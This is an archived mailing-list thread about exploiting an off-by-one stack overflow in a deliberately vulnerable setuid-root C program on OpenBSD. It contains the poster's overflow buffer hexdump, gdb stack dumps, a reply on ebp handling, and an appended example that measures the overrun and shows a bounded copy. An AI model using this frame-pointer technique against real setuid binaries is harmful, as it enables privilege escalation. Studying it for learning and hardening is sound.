Message-ID: <F21C7C637A79E84783A75AE36EAFE3DE02F30571@zbnalpex002.na.webmd.net>
From: Jason.Deckard at webmd.net (Deckard, Jason)
Subject: exploiting off by one

Hi Joe,

I don't think the value in ebp is being used by main's caller.  As you know,
the calling convention requires the called procedure to preserve the state
of ebp, but that is no guarantee that the caller will use ebp to restore
esp.

Looking at a disassembled version of your code, I can see gcc (version 3.2.3
here) reclaims the parts of the stack used by parameters by increasing esp
with a constant value.  For example:

	lea	0xffffff78(%ebp),%eax
	push	%eax
	call	80482c8
	add	$0x8,%esp

I suspect something similar is being done by main's caller.  My apologies if
I'm missing something obvious here.

Regards,
Jason Deckard

-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Joe Hickory
Sent: Thursday, April 15, 2004 2:26 AM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] exploiting off by one


hi fd, 
 
i'm trying to exploit some overflows to see how it works. i can exploit a
"normal" stack overflow without problem, but now i'm trying to exploit an
off by one overflow and have some questions, first see what i did: 
  
vulnerable program: 
 
#include <stdio.h> 
#include <unistd.h> 
#include <sys/types.h> 
#include <string.h>                         /* strlen() needs this; it was missing */
#define BUFSIZE 128 
 
int main(int argc, char **argv) { 
        char buffer[BUFSIZE]; 
        int i, bufsiz; 
        uid_t userid; 
        bufsiz = BUFSIZE; 
 
        userid = geteuid(); 
        setuid(userid); 
        printf("userid: %i \n", (int)userid); 
        printf("buffsize: %i \n", (int)sizeof(buffer)); 
        printf("buffsize: %i \n", bufsiz); 
        for(i=0;i<=sizeof(buffer);i++) {    /* off by one: i == 128 writes past buffer */ 
                buffer[i] = argv[1][i];     /* no length check, no NUL terminator */ 
        } 
        printf("buffsize: %i \n", (int)strlen(buffer));  /* line 21: gdb breakpoint below */ 
        printf("buffer: %s\n", buffer); 
 
        return 0; 
} 
 
 
$ ls -l 
-rwsr-xr-x   1 root  wheel     7788 Apr 14 23:43 offbyone 
 
STARTING EGGSHELL: 
 
$ ./eggframeshell 134 68 1100 
	$EGG at:        0xcfbfd634 
	last_byte: 44 
OVERFLOW BUFFER: 
$ echo -n $IJV | hexdump -v 
0000000 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000010 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000020 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000030 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000040 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000050 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000060 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000070 d634 cfbf d634 cfbf d634 4444 4444 4444 
0000080 4444 cfbf 
0000084 
 
$ gdb ./offbyone 
GNU gdb 4.16.1 
Copyright 1996 Free Software Foundation, Inc. 
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions. 
Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB.  Type "show warranty" for details. 
This GDB was configured as "i386-unknown-openbsd3.5"... 
(gdb) break 21 
warning: gdb ignores `const' qualifiers. 
Breakpoint 1 at 0x667: file offbyone.c, line 21. 
(gdb) run $IJV 
Starting program: /./offbyone $IJV 
userid: 1000 
buffsize: 128 
buffsize: 128 
 
Breakpoint 1, main (argc=2, argv=0xcfbfd220) at offbyone.c:21 
21              printf("buffsize: %i \n", strlen(buffer)); 
(gdb) info frame 
Stack level 0, frame at 0xcfbfd1c0: 
 eip = 0x667 in main (offbyone.c:21); saved eip 0x4b1 
 called by frame at 0xcfbfd144 
 source language c. 
 Arglist at 0xcfbfd1c0, args: argc=2, argv=0xcfbfd220 
 Locals at 0xcfbfd1c0, Previous frame's sp is 0x0 
 Saved registers: 
  ebx at 0xcfbfd118, ebp at 0xcfbfd1c0, esi at 0xcfbfd11c, eip at 0xcfbfd1c4
(gdb) x/100x $esp 
0xcfbfd118:     0xcfbfd368      0xcfbfd220      0x00000001      0x00000000 
0xcfbfd128:     0x00000000      0xcfbfd17c      0x48f31671      0x000003e8 
0xcfbfd138:     0x00000080      0x00000081      0xcfbfd634      0xcfbfd634 
0xcfbfd148:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd158:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd168:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd178:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd188:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd198:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd1a8:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd1b8:     0x4444d634      0x44444444      0xcfbfd144      0x000004b1 
0xcfbfd1c8:     0x00000002      0xcfbfd220      0xcfbfd22c      0xcfbfd368 
0xcfbfd1d8:     0xcfbfd1fc      0x00000385      0x0000049f      0x00000000 
0xcfbfd1e8:     0xcfbfd21c      0x00001000      0x48f2e000      0x00000000 
0xcfbfd1f8:     0x00000410      0xcfbfd21c      0x00000427      0x00000002 
0xcfbfd208:     0xcfbfd220      0xcfbfd22c      0x00000000      0xcfbfdff0 
0xcfbfd218:     0x00000000      0x00000002      0xcfbfd368      0xcfbfd374 
0xcfbfd228:     0x00000000      0xcfbfd3f9      0xcfbfd424      0xcfbfd495 
0xcfbfd238:     0xcfbfd4a3      0xcfbfd4b1      0xcfbfd4c9      0xcfbfd4dd 
0xcfbfd248:     0xcfbfd4f4      0xcfbfd519      0xcfbfd536      0xcfbfd5bf 
0xcfbfd258:     0xcfbfd5ca      0xcfbfd5dd      0xcfbfdddd      0x00000000 
0xcfbfd268:     0x00000003      0x00000034      0x00000004      0x00000020 
0xcfbfd278:     0x00000005      0x00000006      0x00000006      0x00001000 
0xcfbfd288:     0x00000007      0x48f2e000      0x00000008      0x00000000 
0xcfbfd298:     0x00000009      0x00000410      0x00000000      0x00000000 
(gdb) 
(gdb) x/x  0xcfbfd634 
0xcfbfd634:     0x90909090 
 
$ ./offbyone $IJV 
userid: 0 
buffsize: 128 
buffsize: 128 
buffsize: 134 
buffer:

4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???
4???4???4???4???4???4???4???4???4???4???4???4?DDDDDDD????

$ 
 
hope it's enough information. just my question is: i manipulated the least
significant byte of the frame pointer, pointing into my buffer. there in my
buffer is the address of my shellcode as the manipulated return address. but
the program is not segfaulting, if the pointer points to $somewhere. it always
exits normally, without opening a root shell to me. 
 
i'm using gcc 2.95 on openbsd 3.5 (with any stack and anti-overflow
protection disabled, "normal" overflow works well) 
 
hope anybody can enlighten me.  
 
joe 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
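Added example, not code from either poster. The loop in Joe's program has two defects: `i <= sizeof(buffer)` copies 129 bytes into a 128-byte array, and the copy neither stops at the input's NUL nor terminates `buffer` (which is why the third `buffsize:` line prints 134 for a 134-byte argument). The block below runs the posted loop inside a larger arena whose tail is filled with a sentinel byte, so the one-byte overrun is counted instead of landing in the saved frame pointer, and places a bounded, terminating copy beside it. `sample_arg`, `posted_loop_overrun`, `copy_arg_bounded` and the 0xAA sentinel are constructed for this example.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

#define BUFSIZE 128

/* Constructed sample argument: n bytes of 'A' followed by a NUL, standing in
 * for the argv[1] string in the post. n is clamped to 255. */
const char *sample_arg(size_t n)
{
    static char arg[256];
    if (n > sizeof arg - 1)
        n = sizeof arg - 1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return arg;
}

/* Instrumented copy of the posted loop. Same bound (i <= BUFSIZE), but the
 * destination is an arena with a sentinel-filled tail, so the byte written past
 * the BUFSIZE-byte buffer can be counted. Returns the number of sentinel bytes
 * clobbered. src must hold at least BUFSIZE + 1 bytes. */
size_t posted_loop_overrun(const char *src)
{
    unsigned char arena[BUFSIZE + 4];
    size_t i, clobbered = 0;

    memset(arena, 0xAA, sizeof arena);
    for (i = 0; i <= BUFSIZE; i++)          /* the posted off-by-one bound */
        arena[i] = (unsigned char)src[i];
    for (i = BUFSIZE; i < sizeof arena; i++)
        if (arena[i] != 0xAA)
            clobbered++;
    return clobbered;
}

/* Hardened copy: at most BUFSIZE - 1 payload bytes, stops at the input's NUL,
 * and always terminates dst. Returns 1 if the input was truncated, else 0. */
int copy_arg_bounded(char dst[BUFSIZE], const char *src)
{
    size_t i;
    for (i = 0; i < BUFSIZE - 1 && src[i] != '\0'; i++)
        dst[i] = src[i];
    dst[i] = '\0';
    return src[i] != '\0';
}

/* Length strlen() reports after the hardened copy (never more than 127). */
size_t bounded_copy_len(const char *src)
{
    char buffer[BUFSIZE];
    copy_arg_bounded(buffer, src);
    return strlen(buffer);
}

/* Truncation flag of the hardened copy for a given input. */
int bounded_copy_truncated(const char *src)
{
    char buffer[BUFSIZE];
    return copy_arg_bounded(buffer, src);
}

int main(void)
{
    const char *longarg = sample_arg(134);   /* same length as the post's argument */

    printf("posted loop: %zu byte(s) written past the buffer\n",
           posted_loop_overrun(longarg));
    printf("bounded copy: strlen = %zu, truncated = %d\n",
           bounded_copy_len(longarg), bounded_copy_truncated(longarg));
    return 0;
}
```

With the 134-byte input the instrumented posted loop reports exactly one byte past the buffer, the single byte that lands on the least significant byte of the saved frame pointer in the gdb dump above; the bounded copy keeps 127 bytes, terminates the string and reports truncation, so `strlen(buffer)` can no longer run off the end of the array.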
